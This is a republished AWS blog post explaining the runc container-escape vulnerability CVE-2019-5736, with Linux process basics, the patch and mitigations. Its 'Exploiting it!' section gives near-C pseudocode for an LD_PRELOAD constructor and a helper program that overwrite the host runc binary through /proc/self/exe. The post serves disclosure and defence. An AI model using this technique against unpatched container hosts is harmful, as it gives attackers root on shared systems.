Note: This post was originally published on the AWS Compute Blog.
On Monday, February 11, CVE-2019-5736 was disclosed. This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc. But how does it work? Dive in!
This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.
A review of Linux process management
Before I explain the vulnerability, here’s a review of some Linux basics.
Processes and syscalls
Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes. Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.
Processes interact with the operating system to perform a variety of operations (for example, reading and writing files, taking input, communicating on the network) via system calls, or syscalls. Syscalls can perform a variety of actions. The ones I’m interested in today involve creating other processes (typically through fork(2) or clone(2)) and changing the currently running program into something else (execve(2)).
File descriptors are how a process interacts with files, as managed by the Linux kernel. File descriptors are short identifiers (numbers) that are passed to the appropriate syscalls for interacting with files: read(2), write(2), close(2), and so forth.
Sometimes a process wants to spawn another process. That might be a shell running a program you typed at the terminal, a daemon that needs a helper, or even concurrent processing without threads. When this happens, the process typically uses the fork(2) or clone(2) syscalls.
These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state. That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.
After the new process is started, it’s the responsibility of both processes to figure out which one they are (am I the parent? Am I the child?). Then, they take the appropriate action. In many cases, the appropriate action is for the child to do some setup and then execute the execve(2) syscall.
The following example shows the use of fork(2), in pseudocode:
func main() {
    child_pid = fork();
    if (child_pid > 0) {
        // This is the parent process, since child_pid is the pid of the
        // child process.
    } else if (child_pid == 0) {
        // This is the child process. It can retrieve its own pid via
        // getpid(2), if desired. This child process still sees all the
        // variables in memory and all the open file descriptors.
    } else {
        // fork(2) failed; no child process was created.
    }
}
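The pseudocode above can be turned into real, runnable C. This is a minimal sketch (the function name `fork_demo` and the use of waitpid(2) to collect the child's exit status are my additions, not from the original post):

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a child that exits with the given code; the parent waits for
 * the child and returns the child's exit status. */
int fork_demo(int child_exit_code) {
    pid_t child_pid = fork();
    if (child_pid < 0) {
        perror("fork");
        return -1;
    }
    if (child_pid == 0) {
        /* Child: sees copies of the parent's variables and the same
         * open file descriptors. Exit with the requested code. */
        _exit(child_exit_code);
    }
    /* Parent: child_pid is the pid of the new child process. */
    int status;
    if (waitpid(child_pid, &status, 0) < 0) {
        perror("waitpid");
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The parent uses waitpid(2) here so the child doesn't linger as a zombie; that's the usual companion to fork(2).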
The execve(2) syscall instructs the Linux kernel to replace the currently executing program with another program, in-place. When called, the Linux kernel loads the new executable as specified and passes the specified arguments. Because this is done in place, the pid is preserved and a variety of other contextual information is carried over, including environment variables, the current working directory, and any open files.
func main() {
    // execl(3) is a wrapper around the execve(2) syscall that accepts the
    // arguments for the executed program as a list.
    // The first argument to execl(3) is the path of the executable to
    // execute, which in this case is the pwd(1) utility for printing out
    // the working directory.
    // The next argument to execl(3) is the first argument passed through
    // to the new program (in a C program, this would be the first element
    // of the argv array, or argv[0]). By convention, this is the same as
    // the path of the executable.
    // The remaining arguments to execl(3) are the other arguments visible
    // in the new program's argv array, terminated by NULL. As you're
    // not passing any additional arguments, just pass NULL here.
    execl("/bin/pwd", "/bin/pwd", NULL);
    // Nothing after this point executes, since the running process has been
    // replaced by the new pwd(1) program.
}
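The fork-then-execve pattern from the last two examples combines into a runnable sketch like the following (the helper name `run_command` is mine, and it assumes a /bin/sh is present, which is true on ordinary Linux systems):

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a child, replace the child with /bin/sh running the given
 * command, and return the command's exit status to the parent. */
int run_command(const char *command) {
    pid_t child_pid = fork();
    if (child_pid < 0) {
        perror("fork");
        return -1;
    }
    if (child_pid == 0) {
        /* Child: execl(3) wraps execve(2) and replaces this process,
         * in place, with a shell running the command. The pid and the
         * open file descriptors carry over. */
        execl("/bin/sh", "sh", "-c", command, (char *)NULL);
        /* Only reached if execl failed. */
        perror("execl");
        _exit(127);
    }
    /* Parent: wait for the command to finish. */
    int status;
    if (waitpid(child_pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

This is essentially what a shell does for every command you type.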
Wait…open files? By default, open files are passed across the execve(2) boundary. This is useful in cases where the new program can’t open the file, for example if there’s a new mount covering the existing path. This is also the mechanism by which the standard I/O streams (stdin, stdout, and stderr) are made available to the new program.
While convenient in some use cases, it’s not always desired to preserve open file descriptors in the new program. This behavior can be changed by passing the O_CLOEXEC flag to open(2) when opening the file or by setting the FD_CLOEXEC flag with fcntl(2). Using O_CLOEXEC or FD_CLOEXEC (which are both short for close-on-exec) prevents the new program from having access to the file descriptor.
func main() {
    // open(2) opens a file. The first argument to open is the path of the
    // file and the second argument is a bitmask of flags that describe
    // options applied to the file that's opened. open(2) then returns a
    // file descriptor, which can be used in subsequent syscalls to
    // represent this file.
    // For this example, open /dev/urandom, which is a file containing
    // random bytes. Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY
    // indicates that the file should be open for reading but not writing,
    // and O_CLOEXEC indicates that the file descriptor should not pass
    // through the execve(2) boundary.
    fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    // Valid file descriptors are non-negative integers, so a returned
    // value < 0 indicates that an error occurred.
    if (fd < 0) {
        // error here stands in for perror(3), a function that prints out
        // the last error that occurred.
        error("could not open /dev/urandom");
        // exit(3) causes a process to exit with a given exit code. Pass 1
        // here to indicate that an error occurred.
        exit(1);
    }
}
What is /proc?
/proc (or proc(5)) is a pseudo-filesystem that provides access to a number of Linux kernel data structures. Every process in Linux has a directory available for it called /proc/[pid]. This directory stores a bunch of information about the process, including the arguments it was given when the program started, the environment variables visible to it, and the open file descriptors.
The special files inside /proc/[pid]/fd describe the file descriptors that the process has open. They look like symbolic links (symlinks), and you can see the original path of the file, but they aren’t exactly symlinks. You can pass them to open(2) even if the original path is inaccessible and get another working file descriptor.
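That "not exactly a symlink" behavior is easy to demonstrate. The sketch below (my own example; it assumes Linux with /proc mounted and a writable /tmp) creates a temporary file, deletes its path, and then reopens it purely through /proc/self/fd:

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create a temp file, unlink its path, then reopen it via
 * /proc/self/fd/[fd] and read its contents back. Returns 0 on
 * success. A real symlink to a deleted path would fail here. */
int reopen_unlinked_file(void) {
    char path[] = "/tmp/procfd-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                     /* original path is now gone */
    if (write(fd, "hello", 5) != 5)
        return -1;

    char proc_path[64];
    snprintf(proc_path, sizeof(proc_path), "/proc/self/fd/%d", fd);
    int fd2 = open(proc_path, O_RDONLY);   /* still works */
    if (fd2 < 0)
        return -1;

    /* fd2 is a fresh open file description, so it reads from offset 0
     * even though fd's offset is already at 5 after the write. */
    char buf[6] = {0};
    ssize_t n = read(fd2, buf, 5);
    close(fd);
    close(fd2);
    return (n == 5 && strcmp(buf, "hello") == 0) ? 0 : -1;
}
```

This same mechanism, applied to /proc/self/exe, is at the heart of the exploit described later.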
Another file inside /proc/[pid] is called exe. This file is like the ones in /proc/[pid]/fd except that it points to the binary program that is executing inside that process.
/proc/[pid] also has a companion directory, /proc/self. This directory is always the same as /proc/[pid] of the process that is accessing it. That is, you can always read your own /proc data from /proc/self without knowing your pid.
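For example, a process can discover which binary it is running with a single readlink(2) call on /proc/self/exe. A small sketch (helper name mine; assumes /proc is mounted):

```c
#include <stdio.h>
#include <unistd.h>

/* Resolve /proc/self/exe into buf to see which binary this process is
 * running. readlink(2) does not NUL-terminate, so do that by hand.
 * Returns the path length, or -1 on error. */
ssize_t own_executable_path(char *buf, size_t len) {
    ssize_t n = readlink("/proc/self/exe", buf, len - 1);
    if (n < 0) {
        perror("readlink");
        return -1;
    }
    buf[n] = '\0';
    return n;
}
```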
Dynamic linking
When writing programs, software developers typically use libraries—collections of previously written code intended to be reused. Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.
In the code example above, you can see the use of a library through a call to a function defined in a library (fork).
Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition. On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.
Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or to address security concerns. In contrast, static linking requires re-compiling and re-linking each program that uses a given library to effect the same change.
On Linux, runtime linking is typically performed by ld-linux.so(8), which is provided by the GNU project toolchain. Dynamically linked libraries are specified by a name embedded into the compiled binary. This dynamic linker reads those names and then performs a search across a standard set of paths to find the associated library file (a shared object file, or .so).
The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH environment variable. The LD_PRELOAD environment variable can tell the linker to load additional, user-specified libraries before all others. This is useful in debugging scenarios to allow selective overriding of symbols without having to rebuild a library entirely.
The vulnerability
Now that the cast of characters is set (fork(2), execve(2), open(2), proc(5), file descriptors, and linking), I can start talking about the vulnerability in runc.
runc is a container runtime. Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”
The primary mechanism for setting up some of these resources, like namespaces, is through flags to the clone(2) syscall that take effect in the new process. The target of the final execve(2) call is the program the user requested. With a container, that target can be specified in the container image or through explicit arguments.
The CVE announcement states:
“The vulnerability allows a malicious container to […] overwrite the host runc binary […]. The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.”
The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…). Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.
Don’t containers protect against this?
Containers are, in many ways, intended to isolate the host from a given workload or to isolate a given workload from the host. One of the main mechanisms for doing this is through a separate view of the filesystem. With a separate view, the container shouldn’t be able to access the host’s files and should only be able to see its own. runc accomplishes this using a mount namespace and mounting the container image’s root filesystem as /. This effectively hides the host’s filesystem.
Even with techniques like this, things can pass through the mount namespace. For example, the /proc/cmdline file contains the running Linux kernel’s command-line parameters. One of those parameters typically indicates the host’s root filesystem, and a container with enough access (like CAP_SYS_ADMIN) can remount the host’s root filesystem within the container’s mount namespace.
That’s not what I’m talking about today, as that requires non-default privileges to run. The interesting thing today is that the /proc filesystem exposes a path to the original program’s file, even if that file is not located in the current mount namespace.
What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere. In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.
runc must be able to perform a number of operations that require elevated privileges, even if your container is limited to a much smaller set of privileges. For example, namespace creation and mounting both require the elevated capability CAP_SYS_ADMIN, and configuring the network requires the elevated capability CAP_NET_ADMIN. You might see a pattern here.
An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace. Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.
However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.
So, /proc exposes a path to the original program’s file, and the process that starts the container runs as root. What if that original program is something important that you knew would run again… like runc?
Exploiting it!
runc’s job is to run commands that you specify. What if you specified /proc/self/exe? It would cause runc to spawn a copy of itself, but running inside the context of the container, with the container’s namespaces, root filesystem, and so on. For example, you could run the following command:
docker run --rm amazonlinux:2 /proc/self/exe
This, by itself, doesn’t get you far—runc doesn’t hurt itself.
Generally, runc is dynamically linked against some libraries that provide implementations for seccomp(2), SELinux, or AppArmor. If you remember from earlier, ld-linux.so(8) searches a standard set of file paths to provide these implementations at runtime. If you start runc again inside the container’s context, with its separate filesystem, you have the opportunity to provide other files in place of the expected library files. These can run your own code instead of the standard library code.
There’s an easier way, though. Instead of having to make something that looks like (for example) libseccomp, you can take advantage of a different feature of the dynamic linker: LD_PRELOAD. And because runc lets you specify environment variables along with the path of the executable to run, you can specify this environment variable, too.
With LD_PRELOAD, you can specify your own libraries to load first, ahead of the other libraries that get loaded. Because the original libraries still get loaded, you don’t actually have to have a full implementation of their interface. Instead, you can selectively override some common functions that you might want and omit others that you don’t.
So now you can inject code through LD_PRELOAD and you have a target to inject it into: runc, by way of /proc/self/exe. For your code to get run, something must call it. You could search for a target function to override, but that means inspecting runc’s code to figure out what could get called and how.
Again, there’s an easier way. Dynamic libraries can specify a “constructor”
that is run immediately when the library is loaded.
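In C, with GCC or Clang, such a constructor is declared with `__attribute__((constructor))`. A minimal sketch (my own illustration, not the exploit code): the marked function runs when the object is loaded, before main() in an executable or at LD_PRELOAD/dlopen(3) time for a shared library, with no explicit call anywhere:

```c
/* A library "constructor": the function below runs automatically when
 * this object is loaded, before main(). Nothing in the program calls
 * it explicitly, which is exactly why it's useful for code injected
 * via LD_PRELOAD. */
static int constructor_ran = 0;

__attribute__((constructor))
static void my_constructor(void) {
    constructor_ran = 1;
}

/* Accessor so other code can observe that the constructor fired. */
int did_constructor_run(void) {
    return constructor_ran;
}
```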
Using the “constructor” along with LD_PRELOAD and specifying the command as /proc/self/exe, you now have a way to inject code and get it to run. That’s it, right? You can now write to /proc/self/exe and overwrite runc!
Not so fast.
The Linux kernel does have a bit of a protection mechanism to prevent you from overwriting the currently running executable. If you open /proc/self/exe for writing, you get -ETXTBSY. This error code indicates that the file is busy, where “TXT” refers to the text (code) section of the binary.
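You can see this protection from any running program on Linux. This sketch (my own; it assumes /proc is mounted) tries to open its own binary for writing and returns the errno the kernel hands back:

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Try to open the currently running executable for writing. On Linux
 * the kernel refuses with ETXTBSY ("text file busy") because the
 * binary's code is mapped into a running process. Returns the errno
 * from the failed open, or 0 if the open unexpectedly succeeded. */
int try_overwrite_self(void) {
    int fd = open("/proc/self/exe", O_WRONLY);
    if (fd >= 0) {
        close(fd);
        return 0;
    }
    return errno;   /* expected: ETXTBSY */
}
```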
You know from earlier that execve(2) is a mechanism to replace the currently running executable with another, which means that the original executable isn’t in use anymore. So instead of just having a single library that you load with LD_PRELOAD, you also must have another executable that can do the dirty work for you, which you can execve(2).
Normally, doing this would still be unsuccessful due to file permissions. Executables are typically not world-writable. But because runc runs as root and does not change users, the new runc process that you started through /proc/self/exe and the helper program that you executed are also run as root.
After you gain write access to the runc file descriptor and you’ve replaced the currently executing program with execve(2), you can replace runc’s content with your own. The other software on the system continues to start runc as part of its normal operation (for example, creating new containers, stopping containers, or performing exec operations inside containers). Your code has the chance to operate instead of runc. When it gets run this way, your code runs as root, in the host’s context instead of in the container’s context.
Now you’re done! You’ve successfully escaped the container and have full root access.
Putting that all together, you get something like the following pseudocode:
Pseudocode for preload.so
func constructor() {
    // /proc/self/exe is a virtual file pointing to the currently running
    // executable. Open it here so that it can be passed to the next
    // process invoked. It must be opened read-only, or the kernel will
    // fail the open syscall with ETXTBSY. You cannot gain write access to
    // the text portion of a running executable.
    fd = open("/proc/self/exe", O_RDONLY);
    if (fd < 0) {
        error("could not open /proc/self/exe");
        exit(1);
    }
    // /proc/self/fd/%d is a virtual file representing the open file
    // descriptor to /proc/self/exe, which you opened earlier.
    filename = sprintf("/proc/self/fd/%d", fd);
    // execl is a call that executes a new executable, replacing the
    // currently running process and preserving aspects like the process
    // ID. Execute the "rewrite" binary, passing it arguments representing
    // the path of the open file descriptor. Because you did not pass
    // O_CLOEXEC when opening the file, the file descriptor remains open in
    // the replacement program and retains the same descriptor.
    execl("/rewrite", "/rewrite", filename, NULL);
    // execl never returns, except on an error
    error("couldn't execl");
}
Pseudocode for the rewrite program
// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents. rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
    fd = 0;
    printf("Running\n");
    for (tries = 0; tries < 10000; tries++) {
        // argv[1] is the argument that contains the path to the virtual
        // file of the read-only file descriptor
        fd = open(argv[1], O_RDWR | O_TRUNC);
        if (fd >= 0) {
            printf("open succeeded\n");
            break;
        } else {
            if (errno != ETXTBSY) {
                // You expect a lot of ETXTBSY, so only print when you
                // get something else
                error("open");
            }
        }
    }
    if (fd < 0) {
        error("exhausted all open attempts");
        exit(1);
    }
    dprintf(fd, "CVE-2019-5736\n");
    printf("wrote over runc!\n");
    fflush(stdout);
}
The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.
How does the patch work?
If you try the same approach with a patched runc, you instead see that opening the file with O_RDWR is denied. This means that the patch is working!
The runc patch operates by taking advantage of some Linux kernel features introduced in kernel 3.17, specifically a syscall called memfd_create(2).
This syscall creates a temporary memory-backed file and a file descriptor that
can be used to access the file. This file descriptor has some special
semantics: It is automatically removed when the last reference to it is
dropped. It’s also in memory, so that just equates to freeing the memory. It
supports another useful feature: file sealing. File sealing allows the file to
be made immutable, even to processes that are running as root.
The runc patch changes the behavior of runc so that it creates a copy of itself in one of these temporary file descriptors, and then seals it. The next time a process launches (via fork(2)) or a process is replaced (via execve(2)), /proc/self/exe will be this sealed, memory-backed file descriptor. When your rewrite program attempts to modify it, the Linux kernel prevents it as it’s a sealed file.
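The sealing behavior itself is easy to demonstrate. This sketch (my own, not the actual runc patch code; it needs Linux ≥ 3.17, and glibc ≥ 2.27 for the memfd_create wrapper) creates a memfd, writes content, seals it, and shows that further writes are refused:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

/* Create a memory-backed file with memfd_create(2), copy content into
 * it, then seal it against all future modification. Returns the errno
 * from a post-seal write attempt (expected: EPERM), 0 if the write
 * unexpectedly succeeded, or -1 on setup failure. */
int sealed_copy_demo(void) {
    int fd = memfd_create("runc-copy", MFD_CLOEXEC | MFD_ALLOW_SEALING);
    if (fd < 0)
        return -1;
    if (write(fd, "binary contents", 15) != 15)
        return -1;

    /* Seal the file: no more writes, growing, shrinking, or even
     * adding further seals. This holds even for root. */
    if (fcntl(fd, F_ADD_SEALS,
              F_SEAL_SEAL | F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE) < 0)
        return -1;

    /* Any further write is now refused by the kernel. */
    if (write(fd, "x", 1) >= 0) {
        close(fd);
        return 0;
    }
    int saved_errno = errno;
    close(fd);
    return saved_errno;
}
```

In the patched runc, /proc/self/exe points at a descriptor sealed this way, so the rewrite program's open-for-write loop never succeeds.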
Could I have avoided being vulnerable?
Yes, a few different mechanisms were available before the patch that provided mitigation for this vulnerability. The one that I mentioned earlier is user namespaces. Mapping to a different user namespace inside the container would mean that normal Linux file permissions would effectively prevent runc from becoming writable because the compromised process inside the container is not running as the real root user.
Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only. A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.
SELinux, when correctly configured, may also prevent this vulnerability.
A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation. This is typically accomplished using a hypervisor or a virtual machine.
Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these. Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust. Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.
Further reading
The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other attempts.
I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly. I’d also like to thank the Amazonians who made it possible for AWS customers to be protected:
- AWS Security who ran the whole process
- Clare Liguori, Onur Filiz, Noah Meyerhans, iliana weller, and Tom Kirchner who performed analysis and validation of the patch
- The Amazon Linux team (and iliana weller specifically) who backported the patch and built new Docker RPMs
- The Amazon ECS, Amazon EKS, and AWS Fargate teams for making patched infrastructure available quickly
- And all of the other AWS teams who put in extra effort to protect AWS customers